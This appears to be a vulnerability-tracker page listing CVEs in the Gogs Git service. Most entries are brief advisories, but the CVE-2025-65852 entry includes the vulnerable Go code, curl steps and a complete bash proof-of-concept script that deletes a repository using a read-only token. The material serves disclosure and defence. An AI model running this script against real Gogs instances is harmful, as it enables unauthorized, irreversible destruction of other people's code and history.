Vendor

Gogs

Products

CVEs

Across products

Status

Private

Products

Gogs
23 CVEs

Recent CVEs

CVE	Sev	Risk	CVSS	EPSS	KEV	Published	Description
CVE-2025-65852	med	0.19	—	—		Feb 6, 2026	### Summary The DELETE /api/v1/repos/:owner/:repo endpoint lacks necessary permission validation middleware. Consequently, any user with read access (including read-only collaborators) can delete the entire repository. This vulnerability stems from the API route configuration only utilizing the repoAssignment() middleware (which only verifies read access) without enforcing reqRepoOwner() or reqRepoAdmin(). ### Details 0. vulnerability location: - Vulnerable Endpoint：DELETE /api/v1/repos/:owner/:repo - Routing configuration file: internal/route/api/v1/api.go (approximately line 253) - Function handling file: internal/route/api/v1/repo/repo.go (approximately lines 320-338) 1. Root Cause Analysis Code Location 1: API Route Configuration (internal/route/api/v1/api.go ~ line 253) ```go // 当前的路由配置（存在漏洞） m.Delete("", repo.Delete) // 仅继承了外层的 repoAssignment() 中间件 ``` Code Location 2: Delete Function Implementation (internal/route/api/v1/repo/repo.go ~ lines 320-338) ```go // Delete 函数内部没有额外的权限检查 func Delete(c *context.APIContext) { // 直接执行删除操作，未验证用户是否为所有者 if err := models.DeleteRepository(c.User.ID, c.Repo.Repository.ID); err != nil { c.Error(500, "DeleteRepository", err) return } c.Status(204) } ``` 2. Missing Permission Check Comparison with route configurations for other sensitive operations: ```go // Webhooks 管理（正确实现） m.Group("/hooks", func() { m.Combo(""). Get(repo.ListHooks). Post(bind(api.CreateHookOption{}), repo.CreateHook) }, reqRepoAdmin()) // ✅ 使用了权限中间件 // 部署密钥管理（正确实现） m.Group("/keys", func() { m.Combo(""). Get(repo.ListDeployKeys). Post(bind(api.CreateKeyOption{}), repo.CreateDeployKey) }, reqRepoAdmin()) // ✅ 使用了权限中间件 // 删除仓库（漏洞） m.Delete("", repo.Delete) // ❌ 没有使用权限中间件 ``` 3. Data Flow Path - API Request Path: DELETE /api/v1/repos/:owner/:repo - Route Handling: The outer middleware repoAssignment() verifies that the user has read access (Passed). - Execution: The system directly executes the repo.Delete() function. - Permission Check: The reqRepoOwner() middleware check is missing. - Internal Validation: There is no permission validation inside the Delete() function either. - Result: Any user with read permission can delete the repository. ### PoC Prerequisites - A running Gogs instance. - The attacker's account is added as a collaborator to the target repository (Read access is sufficient). - The attacker possesses a valid API access token. - The target repository exists and is accessible. 📜 Test Steps (Bash) 1. Verify Gogs service is running curl -I http://localhost:10880 2. Create test accounts and repository - Owner account: owner / owner123456 - Read-only account: victim / victim123456 - Test repository: owner/delete-test <img width="1580" height="832" alt="image" src="https://github.com/user-attachments/assets/d1babac8-d952-4765-ba34-d4891c12b8db" /> 3. Add 'victim' as a read-only collaborator Perform this via the Web UI or API <img width="1597" height="725" alt="image" src="https://github.com/user-attachments/assets/f76db1d4-9e45-4a97-af22-50db124ec4d0" /> <img width="1597" height="760" alt="image" src="https://github.com/user-attachments/assets/f6ef3bd9-47d4-4202-bf10-2022be557f16" /> 4. Obtain API token for 'victim' curl -X POST http://localhost:10880/api/v1/users/victim/tokens \ -u victim:victim123456 \ -H "Content-Type: application/json" \ -d '{"name":"test-token"}' 5. Resource deleted <img width="1602" height="483" alt="image" src="https://github.com/user-attachments/assets/3e77aaaa-ffbc-4521-be4b-9a62f36499ff" /> Web UI：Target repository deletion successful <img width="1581" height="853" alt="image" src="https://github.com/user-attachments/assets/fbd6b4a4-c874-44f9-9b6e-765371eddcc7" /> 📜 PoC Script ```bash #!/bin/bash # Gogs 仓库删除授权绕过漏洞 PoC # ============ 配置信息 ============ GOGS_URL="http://localhost:10880" TARGET_REPO="owner/delete-test" VICTIM_TOKEN="your_victim_read_only_token_here" # ============ 执行攻击 ============ echo "========================================" echo "Gogs 仓库删除授权绕过漏洞 PoC" echo "========================================" echo "" echo "目标仓库: $TARGET_REPO" echo "攻击者权限: Read（只读）" echo "预期行为: 403 Forbidden（应该被拒绝）" echo "" # 步骤1：验证仓库存在 echo "[步骤1] 验证目标仓库存在..." REPO_CHECK=$(curl -s -o /dev/null -w "%{http_code}" \ -H "Authorization: token $VICTIM_TOKEN" \ "$GOGS_URL/api/v1/repos/$TARGET_REPO") if [ "$REPO_CHECK" == "200" ]; then echo "✓ 仓库存在且可访问" else echo "✗ 仓库不存在或无权访问 (状态码: $REPO_CHECK)" exit 1 fi # 步骤2：尝试删除仓库（漏洞利用） echo "" echo "[步骤2] 使用只读权限尝试删除仓库..." DELETE_RESPONSE=$(curl -s -w "\nHTTP_CODE:%{http_code}" \ -X DELETE \ -H "Authorization: token $VICTIM_TOKEN" \ "$GOGS_URL/api/v1/repos/$TARGET_REPO") DELETE_CODE=$(echo "$DELETE_RESPONSE" \| grep "HTTP_CODE:" \| cut -d: -f2) echo "实际状态码: $DELETE_CODE" echo "" # 步骤3：验证结果 if [ "$DELETE_CODE" == "204" ] \|\| [ "$DELETE_CODE" == "200" ]; then echo "========================================" echo "🔴 漏洞确认：删除成功！" echo "========================================" echo "" echo "只读权限用户成功删除了仓库！" echo "" # 验证仓库是否真的被删除 sleep 2 echo "验证仓库是否真的被删除..." VERIFY_CHECK=$(curl -s -o /dev/null -w "%{http_code}" \ -H "Authorization: token $VICTIM_TOKEN" \ "$GOGS_URL/api/v1/repos/$TARGET_REPO") if [ "$VERIFY_CHECK" == "404" ]; then echo "✗ 仓库已被完全删除（404 Not Found）" echo "" echo "危害确认：" echo " - 仓库及所有数据永久丢失" echo " - 代码历史记录不可恢复" echo " - 这是一个 HIGH 级别的严重漏洞" else echo "? 仓库状态未知 (状态码: $VERIFY_CHECK)" fi elif [ "$DELETE_CODE" == "403" ]; then echo "========================================" echo "✅ 无漏洞：操作被正确拒绝" echo "========================================" echo "" echo "只读权限用户无法删除仓库，权限检查正常" else echo "========================================" echo "⚠️ 未预期的响应" echo "========================================" echo "" echo "状态码: $DELETE_CODE" echo "这可能表示 API 端点不存在或其他错误" fi echo "" echo "========================================" echo "PoC 执行完成" echo "========================================" ``` ### Impact Vulnerability Type: Broken Access Control (CWE-284) Description: A critical authorization bypass vulnerability exists in the Gogs API. The access control mechanism fails to properly validate permissions for destructive operations. Consequences: An authenticated attacker with low-level privileges (e.g., a collaborator with Read-Only access) can exploit this vulnerability to issue unauthorized DELETE requests. This allows the attacker to permanently delete entire repositories, resulting in the immediate loss of all source code, git history, issues, and wiki documentation. Severity: This vulnerability poses a critical risk to data integrity and availability, potentially leading to irreversible data loss and significant operational disruption for affected organizations. The Core Risk: Privilege Escalation & Data Destruction The most critical aspect of this vulnerability is the violation of the Principle of Least Privilege. It allows a user with the lowest level of access (Read-Only) to execute the most destructive action possible (Delete).
CVE-2025-8110		0.06	—	0.18	KEV	Dec 10, 2025	Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code.
CVE-2026-26276		0.00	—	0.00		Mar 5, 2026	Gogs is an open source self-hosted Git service. Prior to version 0.14.2, an attacker can store an HTML/JavaScript payload in a repository’s Milestone name, and when another user selects that Milestone on the New Issue page (/issues/new), a DOM-Based XSS is triggered. This issue has been patched in version 0.14.2.
CVE-2026-26196		0.00	—	0.00		Mar 5, 2026	Gogs is an open source self-hosted Git service. Prior to version 0.14.2, gogs api still accepts tokens in url params like token and access_token, which can leak through logs, browser history, and referrers. This issue has been patched in version 0.14.2.
CVE-2026-26195		0.00	—	0.00		Mar 5, 2026	Gogs is an open source self-hosted Git service. Prior to version 0.14.2, stored xss is still possible through unsafe template rendering that mixes user input with safe plus permissive sanitizer handling of data urls. This issue has been patched in version 0.14.2.
CVE-2026-26194		0.00	—	0.00		Mar 5, 2026	Gogs is an open source self-hosted Git service. Prior to version 0.14.2, there's a security issue in gogs where deleting a release can fail if a user controlled tag name is passed to git without the right separator, this lets git options get injected and mess with the process. This issue has been patched in version 0.14.2.
CVE-2026-25921		0.00	—	0.00		Mar 5, 2026	Gogs is an open source self-hosted Git service. Prior to version 0.14.2, overwritable LFS object across different repos leads to supply-chain attack, all LFS objects are vulnerable to be maliciously overwritten by malicious attackers. This issue has been patched in version 0.14.2.
CVE-2026-26022		0.00	—	0.00		Mar 5, 2026	Gogs is an open source self-hosted Git service. Prior to version 0.14.2, a stored cross-site scripting (XSS) vulnerability exists in the comment and issue description functionality. The application's HTML sanitizer explicitly allows data: URI schemes, enabling authenticated users to inject arbitrary JavaScript execution via malicious links. This issue has been patched in version 0.14.2.
CVE-2026-25229		0.00	—	0.00		Feb 19, 2026	Gogs is an open source self-hosted Git service. Versions 0.13.4 and below have a broken access control vulnerability which allows authenticated users with write access to any repository to modify labels belonging to other repositories. The UpdateLabel function in the Web UI (internal/route/repo/issue.go) fails to verify that the label being modified belongs to the repository specified in the URL path, enabling cross-repository label tampering attacks. The vulnerability exists in the Web UI's label update endpoint POST /:username/:reponame/labels/edit. The handler function UpdateLabel uses an incorrect database query function that bypasses repository ownership validation. This issue has been fixed in version 0.14.1.
CVE-2026-25242		0.00	—	0.00		Feb 19, 2026	Gogs is an open source self-hosted Git service. Versions 0.13.4 and below expose unauthenticated file upload endpoints by default. When the global RequireSigninView setting is disabled (default), any remote user can upload arbitrary files to the server via /releases/attachments and /issues/attachments. This enables the instance to be abused as a public file host, potentially leading to disk exhaustion, content hosting, or delivery of malware. CSRF tokens do not mitigate this attack due to same-origin cookie issuance. This issue has been fixed in version 0.14.1.
CVE-2026-25232		0.00	—	0.00		Feb 19, 2026	Gogs is an open source self-hosted Git service. Versions 0.13.4 and below have an access control bypass vulnerability which allows any repository collaborator with Write permissions to delete protected branches (including the default branch) by sending a direct POST request, completely bypassing the branch protection mechanism. This vulnerability in the DeleteBranchPost function eenables privilege escalation from Write to Admin level, allowing low-privilege users to perform dangerous operations that should be restricted to administrators only. Although Git Hook layer correctly prevents protected branch deletion via SSH push, the web interface deletion operation does not trigger Git Hooks, resulting in complete bypass of protection mechanisms. In oder to exploit this vulnerability, attackers must have write permissions to the target repository, protected branches configured to the target repository and access to the Gogs web interface. This issue has been fixed in version 0.14.1.
CVE-2026-25120		0.00	—	0.00		Feb 19, 2026	Gogs is an open source self-hosted Git service. In versions 0.13.4 and below, the DeleteComment API does not verify that the comment belongs to the repository specified in the URL. This allows a repository administrator to delete comments from any other repository by supplying arbitrary comment IDs, bypassing authorization controls. The DeleteComment function retrieves a comment by ID without verifying repository ownership and the Database function DeleteCommentByID performs no repository validation. This issue has been fixed in version 0.14.0.
CVE-2026-24135		0.00	—	0.00		Feb 6, 2026	Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, a path traversal vulnerability exists in the updateWikiPage function of Gogs. The vulnerability allows an authenticated user with write access to a repository's wiki to delete arbitrary files on the server by manipulating the old_title parameter in the wiki editing form. This issue has been patched in versions 0.13.4 and 0.14.0+dev.
CVE-2026-23633		0.00	—	0.00		Feb 6, 2026	Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, there is an arbitrary file read/write via path traversal in Git hook editing. This issue has been patched in versions 0.13.4 and 0.14.0+dev.
CVE-2026-23632		0.00	—	0.00		Feb 6, 2026	Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, the endpoint "PUT /repos/:owner/:repo/contents/*" does not require write permissions and allows access with read permission only via repoAssignment(). After passing the permission check, PutContents() invokes UpdateRepoFile(), which results in commit creation and the execution of git push. As a result, a token with read-only permission can be used to modify repository contents. This issue has been patched in versions 0.13.4 and 0.14.0+dev.
CVE-2026-22592		0.00	—	0.00		Feb 6, 2026	Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, an authenticated user can cause a DOS attack. If one of the repo files is deleted before synchronization, it will cause the application to crash. This issue has been patched in versions 0.13.4 and 0.14.0+dev.
CVE-2025-64175		0.00	—	0.00		Feb 6, 2026	Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, Gogs’ 2FA recovery code validation does not scope codes by user, enabling cross-account bypass. If an attacker knows a victim’s username and password, they can use any unused recovery code (e.g., from their own account) to bypass the victim’s 2FA. This enables full account takeover and renders 2FA ineffective in all environments where it's enabled.. This issue has been patched in versions 0.13.4 and 0.14.0+dev.
CVE-2025-64111		0.00	—	0.00		Feb 6, 2026	Gogs is an open source self-hosted Git service. In version 0.13.3 and prior, due to the insufficient patch for CVE-2024-56731, it's still possible to update files in the .git directory and achieve remote command execution. This issue has been patched in versions 0.13.4 and 0.14.0+dev.
CVE-2024-56731		0.00	—	0.03		Jun 24, 2025	Gogs is an open source self-hosted Git service. Prior to version 0.13.3, it's still possible to delete files under the .git directory and achieve remote command execution due to an insufficient patch for CVE-2024-39931. Unprivileged user accounts can execute arbitrary commands on the Gogs instance with the privileges of the account specified by RUN_USER in the configuration. Allowing attackers to access and alter any users' code hosted on the same instance. This issue has been patched in version 0.13.3.
CVE-2024-55947		0.00	—	0.76		Dec 23, 2024	Gogs is an open source self-hosted Git service. A malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. The vulnerability is fixed in 0.13.1.